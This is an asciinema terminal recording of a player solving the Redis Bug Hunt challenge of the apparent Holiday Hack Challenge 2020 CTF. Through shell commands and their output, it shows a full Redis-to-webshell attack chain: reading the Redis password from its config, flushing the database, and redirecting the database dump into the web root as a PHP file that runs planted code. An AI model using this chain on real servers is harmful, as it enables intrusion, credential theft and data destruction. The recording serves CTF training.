{"version": 2, "width": 80, "height": 25, "timestamp": 1608931805, "env": {"SHELL": "/bin/zsh", "TERM": "xterm-256color"}}
[0.536579, "o", "\u001b[1m\u001b[7m%\u001b[27m\u001b[1m\u001b[0m                                                                               \r \r"]
[0.642828, "o", "\u001b]2;crahan@Lexapro: ~/Projects/CTF/HolidayHackChallenge2020/Tools\u0007\u001b]1;..nge2020/Tools\u0007"]
[0.717919, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\r\n\u001b[1;36mCTF/HolidayHackChallenge2020/Tools\u001b[0m via \u001b[1;33m🐍 \u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33mv3.8.3\u001b[0m\u001b[1;33m (\u001b[0m\u001b[1;33mhhc2020\u001b[0m\u001b[1;33m)\u001b[0m \r\n\u001b[1;32m❯\u001b[0m \u001b[K"]
[0.717968, "o", "\u001b[?1h\u001b="]
[0.71824, "o", "\u001b[?2004h"]
[1.25817, "o", "asciinema rec t8_redis-bug-hunt"]
[1.434647, "o", "\u001b[31Dpython cpi.py \"redis&id=3c930cbf-5e9a-4e51-b71a-67e9607ebb03\""]
[3.444637, "o", "\u001b[?1l\u001b>"]
[3.444756, "o", "\u001b[?2004l\r\r\n"]
[3.446624, "o", "\u001b]2;python cpi.py \"redis&id=3c930cbf-5e9a-4e51-b71a-67e9607ebb03\"\u0007\u001b]1;python\u0007"]
[5.63975, "o", "tcp        0      0 localhost:6379          0.0.0.0:*               LISTEN     \r\n"]
[5.641369, "o", "\u001b[H\u001b[2J\u001b[3J"]
[5.657064, "o", "We need your help!!\r\n\r\nThe server stopped working, all that's left is the maintenance port.\r\n\r\nTo access it, run:\r\n\r\ncurl http://localhost/maintenance.php\r\n\r\nWe're pretty sure the bug is in the index page. Can you somehow use the\r\nmaintenance page to view the source code for the index page?\r\n"]
[5.669968, "o", "\u001b]0;player@444b1d39e899: ~\u0007player@444b1d39e899:~$ "]
[5.729416, "o", "tcp        0      0 localhost:6379          0.0.0.0:*               LISTEN     \r\n"]
[5.730351, "o", "\u001b[H\u001b[2J\u001b[3J"]
[5.746487, "o", "We need your help!!\r\n\r\nThe server stopped working, all that's left is the maintenance port.\r\n\r\nTo access it, run:\r\n\r\ncurl http://localhost/maintenance.php\r\n\r\nWe're pretty sure the bug is in the index page. Can you somehow use the\r\nmaintenance page to view the source code for the index page?\r\n"]
[5.759086, "o", "\u001b]0;player@317c9993e1a9: ~\u0007player@317c9993e1a9:~$ "]
[11.666608, "o", "curl http://lo"]
[11.66733, "o", "calhost/maintenance.php"]
[12.404248, "o", "\r\n"]
[12.41618, "o", "\r\n\r\nERROR: 'cmd' argument required (use commas to separate commands); eg:\r\ncurl http://localhost/maintenance.php?cmd=help\r\ncurl http://localhost/maintenance.php?cmd=mget,example1\r\n\r\n"]
[12.41696, "o", "\u001b]0;player@317c9993e1a9: ~\u0007player@317c9993e1a9:~$ \u001b[K"]
[17.474624, "o", "curl http://lo"]
[17.475692, "o", "calhost/maintena"]
[17.476494, "o", "nce."]
[17.477951, "o", "php?cmd=help"]
[18.382912, "o", "\r\n"]
[18.403232, "o", "Running: redis-cli --raw -a '<password censored>' 'help'\r\n\r\nredis-cli 5.0.3\r\nTo get help about Redis commands type:\r\n      \"help @<group>\" to get a list of commands in <group>\r\n      \"help <command>\" for help on <command>\r\n      \"help <tab>\" to get a list of possible help topics\r\n      \"quit\" to exit\r\n\r\nTo set redis-cli preferences:\r\n      \":set hints\" enable online hints\r\n      \":set nohints\" disable online hints\r\nSet your preferences in ~/.redisclirc\r\n"]
[18.404402, "o", "\u001b]0;player@317c9993e1a9: ~\u0007player@317c9993e1a9:~$ \u001b[K"]
[20.763946, "o", "#"]
[21.026492, "o", " "]
[21.103796, "o", "w"]
[21.160279, "o", "e"]
[21.412511, "o", " "]
[21.503418, "o", "c"]
[21.621272, "o", "o"]
[21.682123, "o", "u"]
[21.80402, "o", "l"]
[21.922031, "o", "d"]
[22.044316, "o", " "]
[23.041882, "o", "u"]
[23.138683, "o", "s"]
[23.2196, "o", "e"]
[23.342742, "o", " "]
[23.522524, "o", "t"]
[23.646295, "o", "h"]
[23.71379, "o", "i"]
[23.789885, "o", "s"]
[23.944233, "o", " "]
[24.750483, "o", "P"]
[24.830103, "o", "H"]
[24.945363, "o", "P"]
[25.157789, "o", " "]
[25.207149, "o", "s"]
[25.313334, "o", "c"]
[25.45611, "o", "r"]
[25.50528, "o", "i"]
[25.546055, "o", "p"]
[25.680982, "o", "t"]
[25.803409, "o", " "]
[25.963307, "o", "t"]
[26.079401, "o", "o"]
[26.254463, "o", " "]
[26.647567, "o", "p"]
[26.757752, "o", "r"]
[26.812616, "o", "o"]
[26.977894, "o", "x"]
[27.096696, "o", "y"]
[27.32413, "o", " "]
[27.715356, "o", "r"]
[27.780149, "o", "e"]
[27.92801, "o", "d"]
[28.045859, "o", "i"]
[28.759136, "o", "s"]
[28.898244, "o", " "]
[28.991008, "o", "c"]
[29.12221, "o", "o"]
[29.249898, "o", "m"]
[29.389613, "o", "m"]
[29.423605, "o", "a"]
[29.535397, "o", "n"]
[29.618029, "o", "d"]
[29.685887, "o", "s"]
[30.30264, "o", "\r\n\u001b]0;player@317c9993e1a9: ~\u0007player@317c9993e1a9:~$ \u001b[K"]
[31.46929, "o", "#"]
[31.663932, "o", " "]
[31.822201, "o", "o"]
[31.897899, "o", "r"]
[32.056628, "o", " "]
[32.137839, "o", "w"]
[32.183302, "o", "e"]
[32.275439, "o", " "]
[32.513909, "o", "c"]
[32.595893, "o", "o"]
[32.651978, "o", "u"]
[32.785637, "o", "l"]
[32.902485, "o", "d"]
[33.028239, "o", " "]
[33.891395, "o", "g"]
[33.932141, "o", "r"]
[33.992143, "o", "a"]
[34.060015, "o", "b"]
[34.233941, "o", " "]
[34.295252, "o", "t"]
[34.399464, "o", "h"]
[34.482077, "o", "e"]
[34.549443, "o", " "]
[34.763625, "o", "p"]
[34.78648, "o", "a"]
[34.84391, "o", "s"]
[34.976546, "o", "s"]
[35.055719, "o", "w"]
[35.19941, "o", "o"]
[35.256288, "o", "r"]
[35.436036, "o", "d"]
[35.573512, "o", " "]
[35.691422, "o", "f"]
[35.780412, "o", "r"]
[35.841832, "o", "o"]
[35.981649, "o", "m"]
[36.198017, "o", " "]
[37.60387, "o", "t"]
[37.68794, "o", "h"]
[37.798852, "o", "e"]
[37.888954, "o", " "]
[38.009892, "o", "c"]
[38.096673, "o", "o"]
[38.227118, "o", "n"]
[38.267407, "o", "f"]
[38.409604, "o", "i"]
[38.488093, "o", "g"]
[38.652978, "o", " "]
[38.829257, "o", ":"]
[38.995032, "o", ")"]
[39.500655, "o", "\r\n\u001b]0;player@317c9993e1a9: ~\u0007player@317c9993e1a9:~$ \u001b[K"]
[40.599197, "o", "g"]
[40.646486, "o", "r"]
[40.717826, "o", "e"]
[40.790794, "o", "p"]
[40.936411, "o", " "]
[41.32176, "o", "p"]
[41.412979, "o", "a"]
[41.478548, "o", "s"]
[41.630907, "o", "s"]
[41.758921, "o", " "]
[42.287826, "o", "/"]
[42.450992, "o", "e"]
[42.508405, "o", "t"]
[42.682517, "o", "c"]
[42.76849, "o", "/"]
[43.038216, "o", "r"]
[43.101244, "o", "e"]
[43.297335, "o", "d"]
[43.555031, "o", "i"]
[43.816293, "o", "s"]
[44.152746, "o", "/"]
[44.431486, "o", "redis.conf "]
[44.932815, "o", "\r\n"]
[44.934106, "o", "requirepass \"R3disp@ss\"\r\n"]
[44.935594, "o", "\u001b]0;player@317c9993e1a9: ~\u0007player@317c9993e1a9:~$ \u001b[K"]
[49.49435, "o", "#"]
[49.748623, "o", " "]
[50.512487, "o", "f"]
[50.60447, "o", "l"]
[50.797014, "o", "u"]
[50.857971, "o", "s"]
[50.951843, "o", "h"]
[51.154129, "o", " "]
[51.234166, "o", "t"]
[51.331776, "o", "h"]
[51.390524, "o", "e"]
[51.516785, "o", " "]
[52.665416, "o", "D"]
[52.714575, "o", "B"]
[53.386529, "o", "\r\n\u001b]0;player@317c9993e1a9: ~\u0007player@317c9993e1a9:~$ "]
[58.336832, "o", "redis-cli --raw -a 'R3disp@s"]
[58.337362, "o", "s' flushall"]
[59.975121, "o", "\r\n"]
[59.980151, "o", "Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.\r\n"]
[59.983043, "o", "OK\r\n"]
[59.983805, "o", "\u001b]0;player@317c9993e1a9: ~\u0007player@317c9993e1a9:~$ \u001b[K"]
[63.37321, "o", "#"]
[63.664853, "o", " "]
[63.922189, "o", "s"]
[63.99934, "o", "e"]
[64.180848, "o", "t"]
[64.264464, "o", " "]
[64.345244, "o", "t"]
[64.457483, "o", "h"]
[64.549125, "o", "e"]
[64.686475, "o", " "]
[65.249562, "o", "w"]
[65.452174, "o", "o"]
[65.506199, "o", "r"]
[65.606733, "o", "k"]
[65.756607, "o", "i"]
[65.925069, "o", "n"]
[65.997229, "o", "g"]
[66.144603, "o", " "]
[66.715382, "o", "f"]
[66.808095, "o", "o"]
[66.960666, "o", "l"]
[66.992889, "o", "d"]
[67.088042, "o", "e"]
[67.22303, "o", "r"]
[67.274185, "o", " "]
[67.429876, "o", "t"]
[67.503212, "o", "o"]
[67.664657, "o", " "]
[67.853198, "o", "/"]
[68.133295, "o", "v"]
[68.19888, "o", "a"]
[68.304514, "o", "r"]
[68.447339, "o", "/"]
[68.636411, "o", "w"]
[68.798944, "o", "w"]
[68.93722, "o", "w"]
[69.02357, "o", "/"]
[69.269499, "o", "h"]
[69.316608, "o", "t"]
[69.478612, "o", "m"]
[69.546666, "o", "l"]
[70.563025, "o", "\r\n"]
[70.56417, "o", "\u001b]0;player@317c9993e1a9: ~\u0007player@317c9993e1a9:~$ \u001b[K"]
[76.242622, "o", "redis-cli --raw -"]
[76.243392, "o", "a 'R3disp@ss' config set dir"]
[76.24395, "o", " /var/www/htm\rml"]
[78.200788, "o", "\r\n"]
[78.205612, "o", "Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.\r\n"]
[78.206556, "o", "OK\r\n"]
[78.207479, "o", "\u001b]0;player@317c9993e1a9: ~\u0007player@317c9993e1a9:~$ \u001b[K"]
[80.705963, "o", "#"]
[81.173196, "o", " "]
[81.84817, "o", "d"]
[82.003844, "o", "i"]
[82.095571, "o", "s"]
[82.151832, "o", "a"]
[82.21956, "o", "b"]
[82.385824, "o", "l"]
[82.459, "o", "e"]
[82.572259, "o", " "]
[82.723368, "o", "c"]
[82.77719, "o", "o"]
[82.909016, "o", "m"]
[83.041857, "o", "p"]
[83.159182, "o", "r"]
[83.235164, "o", "e"]
[83.391862, "o", "s"]
[83.4893, "o", "s"]
[83.58128, "o", "i"]
[83.608539, "o", "o"]
[83.839101, "o", "n"]
[84.287799, "o", " "]
[84.441756, "o", "a"]
[84.512839, "o", "s"]
[84.588925, "o", " "]
[84.746427, "o", "w"]
[84.799403, "o", "e"]
[84.889796, "o", " "]
[85.039721, "o", "n"]
[85.104198, "o", "e"]
[85.21938, "o", "e"]
[85.399953, "o", "d"]
[85.483363, "o", " "]
[85.706974, "o", "o"]
[85.760716, "o", "u"]
[85.809814, "o", "t"]
[85.981194, "o", " "]
[86.196548, "o", "p"]
[86.289406, "o", "h"]
[86.401282, "o", "p"]
[86.639094, "o", " "]
[86.753851, "o", "c"]
[86.879187, "o", "o"]
[86.951252, "o", "d"]
[87.007892, "o", "e"]
[87.103871, "o", " "]
[87.274671, "o", "t"]
[87.348179, "o", "o"]
[87.528534, "o", " "]
[87.606058, "o", "e"]
[87.682436, "o", "n"]
[87.806036, "o", "d"]
[87.883036, "o", " "]
[88.064023, "o", "j"]
[88.07037, "o", "u"]
[88.132428, "o", "p"]
[88.389693, "o", "  \r"]
[88.815118, "o", "\u001b[Aplayer@317c9993e1a9:~$ # disable compression as we need out php code to end jup\u001b[K\r\n\r\u001b[K\u001b[Aplayer@317c9993e1a9:~$ # disable compression as we need out php code to end jup"]
[88.94423, "o", "\b \b"]
[89.081866, "o", "\b \b"]
[89.222465, "o", "\b \b"]
[89.718509, "o", "u"]
[89.833763, "o", "p"]
[90.202802, "o", " "]
[90.336807, "o", "i \r"]
[90.535298, "o", "n"]
[90.600505, "o", " "]
[90.713735, "o", "t"]
[90.827063, "o", "h"]
[90.904701, "o", "e"]
[91.040371, "o", " "]
[91.861493, "o", "D"]
[91.940509, "o", "B"]
[92.109553, "o", " "]
[92.183265, "o", "f"]
[92.295323, "o", "i"]
[92.349877, "o", "l"]
[92.376147, "o", "e"]
[92.828629, "o", " "]
[93.683359, "o", "u"]
[93.843585, "o", "n"]
[94.112036, "o", "m"]
[94.207772, "o", "o"]
[94.922584, "o", "d"]
[95.131131, "o", "i"]
[95.218931, "o", "f"]
[95.333197, "o", "i"]
[95.397333, "o", "e"]
[95.590622, "o", "d"]
[96.684819, "o", "\r\n\u001b]0;player@317c9993e1a9: ~\u0007player@317c9993e1a9:~$ \u001b[K"]
[101.836255, "o", "redis-cli --raw "]
[101.838467, "o", "-a 'R3disp@ss' config set "]
[101.839035, "o", "rdbcompression n\rno"]
[102.592186, "o", "\r\n"]
[102.597541, "o", "Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.\r\n"]
[102.59814, "o", "OK\r\n"]
[102.598815, "o", "\u001b]0;player@317c9993e1a9: ~\u0007player@317c9993e1a9:~$ \u001b[K"]
[105.751678, "o", "#"]
[106.078576, "o", " "]
[106.296145, "o", "n"]
[106.379364, "o", "o"]
[106.45166, "o", "w"]
[106.642584, "o", " "]
[106.792215, "o", "s"]
[106.885467, "o", "e"]
[107.041633, "o", "t"]
[107.163924, "o", " "]
[107.224082, "o", "t"]
[107.357848, "o", "h"]
[107.424455, "o", "e"]
[107.557386, "o", " "]
[107.727914, "o", "n"]
[107.804027, "o", "a"]
[107.88632, "o", "m"]
[107.963494, "o", "e"]
[108.057788, "o", " "]
[108.240792, "o", "o"]
[108.265556, "o", "f"]
[108.427502, "o", " "]
[108.451613, "o", "t"]
[108.570641, "o", "h"]
[108.624095, "o", "e"]
[108.756221, "o", " "]
[108.893541, "o", "D"]
[108.967064, "o", "B"]
[109.136835, "o", " "]
[109.223842, "o", "f"]
[109.330556, "o", "i"]
[109.370684, "o", "l"]
[109.409272, "o", "e"]
[109.570188, "o", " "]
[109.800485, "o", "("]
[110.590471, "o", "o"]
[110.644866, "o", "u"]
[110.68759, "o", "r"]
[110.859011, "o", " "]
[110.941265, "o", "s"]
[111.021857, "o", "c"]
[111.168668, "o", "i"]
[111.169685, "o", "r"]
[111.221976, "o", "p"]
[111.347653, "o", "t"]
[111.4619, "o", " "]
[111.585557, "o", "n"]
[111.623425, "o", "a"]
[111.740294, "o", "m"]
[111.79572, "o", "e"]
[112.065011, "o", "\b \b"]
[112.201031, "o", "\b \b"]
[112.336178, "o", "\b \b"]
[112.463908, "o", "\b \b"]
[112.606306, "o", "\b \b"]
[112.754653, "o", "\b \b"]
[112.889272, "o", "\b \b"]
[113.02618, "o", "\b \b"]
[113.162977, "o", "\b \b"]
[113.638624, "o", "r"]
[113.741165, "o", "i"]
[113.822178, "o", "p"]
[113.892148, "o", "t"]
[114.027991, "o", " "]
[114.15875, "o", "n"]
[114.227365, "o", "a"]
[114.319996, "o", "m"]
[114.368066, "o", "e"]
[115.149251, "o", ")"]
[115.695227, "o", "\r\n\u001b]0;player@317c9993e1a9: ~\u0007player@317c9993e1a9:~$ \u001b[K"]
[120.850565, "o", "redis-cli --raw -a 'R3disp@ss'"]
[120.85147, "o", " config set dbfilename redis\rs_rce.php"]
[121.555346, "o", "\r\n"]
[121.561654, "o", "Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.\r\n"]
[121.56204, "o", "OK\r\n"]
[121.562521, "o", "\u001b]0;player@317c9993e1a9: ~\u0007player@317c9993e1a9:~$ \u001b[K"]
[124.556872, "o", "#"]
[124.964824, "o", " "]
[126.382538, "o", "A"]
[126.530622, "o", "d"]
[126.685368, "o", "d"]
[127.217925, "o", " "]
[127.341829, "o", "a"]
[127.420463, "o", " "]
[128.632632, "o", "j"]
[128.80602, "o", "e"]
[129.757148, "o", "\b \b"]
[129.881008, "o", "\b \b"]
[130.14073, "o", "k"]
[130.244573, "o", "e"]
[130.386405, "o", "y"]
[130.620641, "o", " "]
[132.018453, "o", "t"]
[132.326151, "o", "\b \b"]
[132.450235, "o", "w"]
[132.81525, "o", "\b \b"]
[132.958963, "o", "c"]
[133.047357, "o", "o"]
[133.260201, "o", "n"]
[133.336731, "o", "a"]
[134.080991, "o", "\b \b"]
[134.137259, "o", "t"]
[134.30084, "o", "a"]
[134.34246, "o", "i"]
[134.491567, "o", "n"]
[134.53442, "o", "i"]
[134.645543, "o", "n"]
[134.73399, "o", "g"]
[134.867031, "o", " "]
[135.094236, "o", "P"]
[135.158631, "o", "H"]
[135.260052, "o", "P"]
[135.521392, "o", " "]
[135.63421, "o", "c"]
[135.755149, "o", "o"]
[135.830203, "o", "d"]
[135.877483, "o", "e"]
[135.971887, "o", " "]
[136.835931, "o", "t"]
[136.957106, "o", "h"]
[137.023197, "o", "a"]
[137.182673, "o", "t"]
[137.249511, "o", " "]
[137.385538, "o", "r"]
[137.577085, "o", "e"]
[137.651054, "o", "a"]
[137.823456, "o", "d"]
[137.884188, "o", "s"]
[138.002986, "o", " "]
[138.258737, "o", "r"]
[138.299109, "o", "f"]
[139.067171, "o", "\b \b"]
[139.183007, "o", "f"]
[139.199932, "o", "\b \b"]
[139.257252, "o", "r"]
[139.397403, "o", "o"]
[139.54903, "o", "m"]
[139.998117, "o", "\b \b"]
[140.131392, "o", "\b \b"]
[140.268783, "o", "\b \b"]
[140.391176, "o", "\b \b"]
[140.449355, "o", "f"]
[140.534426, "o", "r"]
[141.053732, "o", "o"]
[141.17913, "o", "m"]
[141.364926, "o", " "]
[141.523357, "o", "i"]
[141.6573, "o", "n"]
[141.703872, "o", "d"]
[141.775886, "o", "e"]
[141.941053, "o", "x"]
[142.087669, "o", "."]
[142.361796, "o", "p"]
[142.466488, "o", "h"]
[142.582183, "o", "p \r"]
[143.10197, "o", " "]
[143.186388, "o", "a"]
[143.30379, "o", "n"]
[143.353422, "o", "d"]
[143.493781, "o", " "]
[143.615185, "o", "s"]
[143.685703, "o", "a"]
[143.895115, "o", "v"]
[143.963248, "o", "e"]
[144.173469, "o", "s"]
[144.300692, "o", " "]
[144.495627, "o", "i"]
[144.616054, "o", "t"]
[144.700976, "o", " "]
[144.807718, "o", "t"]
[144.907768, "o", "o"]
[145.132821, "o", " "]
[146.355968, "o", "f"]
[146.625792, "o", "."]
[146.959673, "o", "t"]
[147.053424, "o", "x"]
[147.100421, "o", "t"]
[148.757613, "o", "\r\n\u001b]0;player@317c9993e1a9: ~\u0007player@317c9993e1a9:~$ \u001b[K"]
[155.017198, "o", "redis-cli --raw -a 'R3disp@s"]
[155.017901, "o", "s' set rce \"<?php file_put_con\rntents('f.txt',"]
[155.018764, "o", "file_get_content"]
[155.019555, "o", "s('index.php')"]
[155.020349, "o", "); ?>\""]
[155.865718, "o", "\r\n"]
[155.872224, "o", "Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.\r\n"]
[155.872992, "o", "OK\r\n"]
[155.873963, "o", "\u001b]0;player@317c9993e1a9: ~\u0007player@317c9993e1a9:~$ \u001b[K"]
[158.530407, "o", "#"]
[159.283837, "o", " "]
[159.376158, "o", "s"]
[159.45395, "o", "a"]
[159.641539, "o", "v"]
[159.697478, "o", "e"]
[159.915299, "o", " "]
[160.483426, "o", "t"]
[160.577727, "o", "h"]
[160.675899, "o", "e"]
[160.810623, "o", " "]
[161.882494, "o", "\b \b"]
[162.020044, "o", "\b \b"]
[162.143517, "o", "\b \b"]
[162.279091, "o", "\b \b"]
[162.408309, "o", "e"]
[162.581204, "o", "v"]
[162.635994, "o", "e"]
[162.701136, "o", "r"]
[162.911279, "o", "t"]
[163.033586, "o", "h"]
[163.134341, "o", "i"]
[163.466004, "o", "\b \b"]
[163.608583, "o", "\b \b"]
[163.742477, "o", "\b \b"]
[163.951596, "o", "y"]
[164.027725, "o", "t"]
[164.08123, "o", "h"]
[164.171376, "o", "o"]
[164.269007, "o", "n"]
[164.364827, "o", "g"]
[164.857915, "o", "\b \b"]
[164.989767, "o", "\b \b"]
[165.137125, "o", "\b \b"]
[165.369612, "o", "i"]
[165.54508, "o", "n"]
[165.634454, "o", "g"]
[165.772406, "o", " "]
[166.182341, "o", "s"]
[166.258617, "o", "o"]
[166.427671, "o", " "]
[166.45703, "o", "t"]
[166.565009, "o", "h"]
[166.644119, "o", "e"]
[166.769582, "o", " "]
[166.901269, "o", "f"]
[167.005904, "o", "i"]
[167.035727, "o", "l"]
[167.113617, "o", "e"]
[167.230166, "o", " "]
[167.40347, "o", "i"]
[167.47017, "o", "s"]
[167.583632, "o", " "]
[167.651215, "o", "c"]
[167.789792, "o", "r"]
[167.975772, "o", "e"]
[168.023795, "o", "a"]
[168.219659, "o", "t"]
[168.298401, "o", "e"]
[168.46636, "o", "d"]
[168.990231, "o", "\r\n\u001b]0;player@317c9993e1a9: ~\u0007player@317c9993e1a9:~$ \u001b[K"]
[174.529175, "o", "redis-cli --ra"]
[174.52981, "o", "w -a 'R3disp@ss' save"]
[175.172742, "o", "\r\n"]
[175.176441, "o", "Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.\r\n"]
[175.180947, "o", "OK\r\n"]
[175.181682, "o", "\u001b]0;player@317c9993e1a9: ~\u0007player@317c9993e1a9:~$ \u001b[K"]
[179.047531, "o", "#"]
[179.330227, "o", " "]
[179.520336, "o", "n"]
[179.604158, "o", "o"]
[179.6505, "o", "w"]
[179.862618, "o", " "]
[180.446361, "o", "c"]
[180.511461, "o", "a"]
[180.675316, "o", "l"]
[180.798623, "o", "l"]
[180.984009, "o", " "]
[181.169896, "o", "o"]
[181.233921, "o", "u"]
[181.276181, "o", "r"]
[181.470748, "o", " "]
[181.927215, "o", "P"]
[181.987653, "o", "H"]
[182.086521, "o", "P"]
[182.336216, "o", " "]
[182.517924, "o", "s"]
[182.609214, "o", "c"]
[182.728813, "o", "r"]
[182.872762, "o", "i"]
[182.913085, "o", "p"]
[183.026512, "o", "t"]
[183.569994, "o", "\r\n"]
[183.571011, "o", "\u001b]0;player@317c9993e1a9: ~\u0007player@317c9993e1a9:~$ "]
[188.579264, "o", "curl http://lo"]
[188.580567, "o", "calhost/redis_rce.php"]
[189.296167, "o", "\r\n"]
[189.307946, "o", "Warning: Binary output can mess up your terminal. Use \"--output -\" to tell \r\nWarning: curl to output it to your terminal anyway, or consider \"--output \r\nWarning: <FILE>\" to save to a file.\r\n"]
[189.308933, "o", "\u001b]0;player@317c9993e1a9: ~\u0007player@317c9993e1a9:~$ \u001b[K"]
[191.20515, "o", "#"]
[191.509526, "o", " "]
[192.94645, "o", "I"]
[193.094029, "o", "n"]
[193.146545, "o", "d"]
[193.201919, "o", "e"]
[193.386702, "o", "x"]
[193.575229, "o", "."]
[193.904568, "o", "h"]
[194.015101, "o", "p"]
[194.577056, "o", "\b \b"]
[194.71491, "o", "\b \b"]
[194.843588, "o", "\b \b"]
[194.966894, "o", "\b \b"]
[195.088628, "o", "\b \b"]
[195.221189, "o", "\b \b"]
[195.344503, "o", "\b \b"]
[195.699684, "o", "\b \b"]
[195.975175, "o", "i"]
[196.165484, "o", "n"]
[196.213777, "o", "d"]
[196.289194, "o", "e"]
[196.4449, "o", "x"]
[196.57921, "o", "."]
[196.942483, "o", "h"]
[197.049342, "o", "p"]
[197.554831, "o", "\b \b"]
[197.690802, "o", "\b \b"]
[197.821894, "o", "p"]
[197.899826, "o", "h"]
[198.010638, "o", "p"]
[198.411766, "o", " "]
[198.630803, "o", "s"]
[198.687707, "o", "h"]
[198.805525, "o", "o"]
[198.888694, "o", "u"]
[198.998836, "o", "l"]
[199.036173, "o", "d"]
[199.181615, "o", " "]
[199.267076, "o", "n"]
[199.359561, "o", "o"]
[199.472706, "o", "w"]
[199.590893, "o", " "]
[199.756449, "o", "b"]
[199.808801, "o", "e"]
[199.946479, "o", " "]
[200.050573, "o", "a"]
[200.251325, "o", "v"]
[200.426984, "o", "a"]
[200.5846, "o", "l"]
[200.627219, "o", "a"]
[200.776962, "o", "b"]
[201.218317, "o", "\b \b"]
[201.38995, "o", "\b \b"]
[201.546849, "o", "\b \b"]
[201.769071, "o", "i"]
[201.846882, "o", "l"]
[201.95661, "o", "a"]
[202.080852, "o", "b"]
[202.226643, "o", "l"]
[202.339727, "o", "e"]
[202.427672, "o", " "]
[202.559736, "o", "a"]
[202.626842, "o", "s"]
[202.714873, "o", " "]
[203.322573, "o", "f"]
[203.652683, "o", "."]
[204.010979, "o", "t"]
[204.09108, "o", "x"]
[204.139375, "o", "t"]
[204.900334, "o", " "]
[205.009166, "o", "a"]
[205.091395, "o", "n"]
[205.161525, "o", "d"]
[205.262252, "o", " "]
[205.436989, "o", "n"]
[205.509595, "o", "o"]
[205.564912, "o", "t"]
[205.875248, "o", " "]
[206.132203, "o", "b"]
[206.207158, "o", "e"]
[206.435121, "o", " "]
[206.63692, "o", "i \r"]
[206.781521, "o", "n"]
[206.892316, "o", "t"]
[206.971957, "o", "e"]
[207.108493, "o", "r"]
[207.349094, "o", "p"]
[207.427676, "o", "r"]
[207.482881, "o", "e"]
[207.95526, "o", "\b \b"]
[208.077759, "o", "\b \b"]
[208.24271, "o", "\b \b"]
[209.245774, "o", "p"]
[209.336879, "o", "r"]
[209.42184, "o", "e"]
[209.64548, "o", "t"]
[209.66811, "o", "e"]
[209.89156, "o", "d"]
[210.345586, "o", " "]
[210.546883, "o", "b"]
[210.691823, "o", "y"]
[210.916562, "o", " "]
[210.962005, "o", "t"]
[211.133433, "o", "h"]
[211.196611, "o", "e"]
[211.82114, "o", " "]
[212.707188, "o", "w"]
[212.774644, "o", "e"]
[212.864939, "o", "b"]
[213.039005, "o", " "]
[213.09975, "o", "s"]
[213.187547, "o", "e"]
[213.368782, "o", "r"]
[213.537159, "o", "v"]
[213.603779, "o", "e"]
[213.647256, "o", "r"]
[214.24701, "o", " "]
[214.344861, "o", "a"]
[214.415195, "o", "s"]
[214.463005, "o", " "]
[214.795179, "o", "P"]
[214.896903, "o", "H"]
[215.037111, "o", "P"]
[215.90811, "o", "\r\n\u001b]0;player@317c9993e1a9: ~\u0007player@317c9993e1a9:~$ \u001b[K"]
[221.270367, "o", "curl http:/"]
[221.270954, "o", "/localhost/f.txt --ou"]
[221.271724, "o", "tput ind"]
[221.273194, "o", "ex.php`"]
[222.026741, "o", "\b \b"]
[223.38522, "o", "\r\n"]
[223.392634, "o", "  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\r\n                                 Dload  Upload   Total   Spent    Left  Speed\r\n\r  0     0    0    "]
[223.393396, "o", " 0    0     0      0      0 --:--:-- --:--:-- --:--:--     0"]
[223.394411, "o", "\r100   488  100   488    0     0   476k      0 --:--:-- --:--:-- --:--:--  476k\r\n"]
[223.39528, "o", "\u001b]0;player@317c9993e1a9: ~\u0007player@317c9993e1a9:~$ \u001b[K"]
[225.852659, "o", "c"]
[225.92661, "o", "a"]
[226.128454, "o", "t"]
[226.280012, "o", " "]
[226.439282, "o", "-"]
[226.79677, "o", "A"]
[227.02424, "o", " "]
[227.77776, "o", "i"]
[227.96924, "o", "n"]
[228.073262, "o", "dex.php "]
[228.885736, "o", "\r\n"]
[228.888599, "o", "<?php$\r\n$\r\n# We found the bug!!$\r\n#$\r\n#         \\   /$\r\n#         .\\-/.$\r\n#     /\\ ()   ()$\r\n#       \\/~---~\\.-~^-.$\r\n# .-~^-./   |   \\---.$\r\n#      {    |    }   \\$\r\n#    .-~\\   |   /~-.$\r\n#   /    \\  A  /    \\$\r\n#         \\/ \\/$\r\n# #####hhc:{\"hash\": \"f25ebc2bfcaa4a5741e44dbd3c5536bc1042d78839f9bbb6611c3efcf37efa14\", \"resourceId\": \"3c930cbf-5e9a-4e51-b71a-67e9607ebb03\"}#####$\r\n$\r\necho \"Something is wrong with this page! Please use http://localhost/maintenance.php to see if you can figure out what's going on\"$\r\n?>$\r\n"]
[228.889759, "o", "\u001b]0;player@317c9993e1a9: ~\u0007player@317c9993e1a9:~$ "]
[231.369872, "o", "#"]
[231.672667, "o", " "]
[231.807958, "o", "q"]
[231.950883, "o", "u"]
[231.997264, "o", "i"]
[232.078108, "o", "t"]
[232.15373, "o", "e"]
[232.224752, "o", " "]
[232.330368, "o", "t"]
[232.45377, "o", "h"]
[232.540289, "o", "e"]
[232.667239, "o", " "]
[232.806772, "o", "b"]
[232.882781, "o", "a"]
[232.973103, "o", "s"]
[233.147438, "o", "t"]
[233.56343, "o", "\b \b"]
[233.705743, "o", "\b \b"]
[233.828032, "o", "\b \b"]
[233.957245, "o", "\b \b"]
[234.212374, "o", "n"]
[234.277917, "o", "a"]
[234.335896, "o", "s"]
[234.569752, "o", "t"]
[234.673542, "o", "y"]
[234.902031, "o", " "]
[235.096671, "o", "b"]
[235.263768, "o", "y"]
[235.353963, "o", "g"]
[235.444535, "o", " "]
[235.849521, "o", "\b \b"]
[235.979914, "o", "\b \b"]
[236.118439, "o", "\b \b"]
[236.317432, "o", "u"]
[236.390772, "o", "g"]
[236.503242, "o", " "]
[236.650291, "o", ":"]
[236.721888, "o", "D"]
[237.298628, "o", "\r\n\u001b]0;player@317c9993e1a9: ~\u0007player@317c9993e1a9:~$ "]
[242.148541, "o", "e"]
[242.324586, "o", "x"]
[242.456791, "o", "i"]
[242.580814, "o", "t"]
[243.032954, "o", "\r\nlogout\r\n"]
[245.806954, "o", "\u001b[1m\u001b[7m%\u001b[27m\u001b[1m\u001b[0m                                                                               \r \r"]
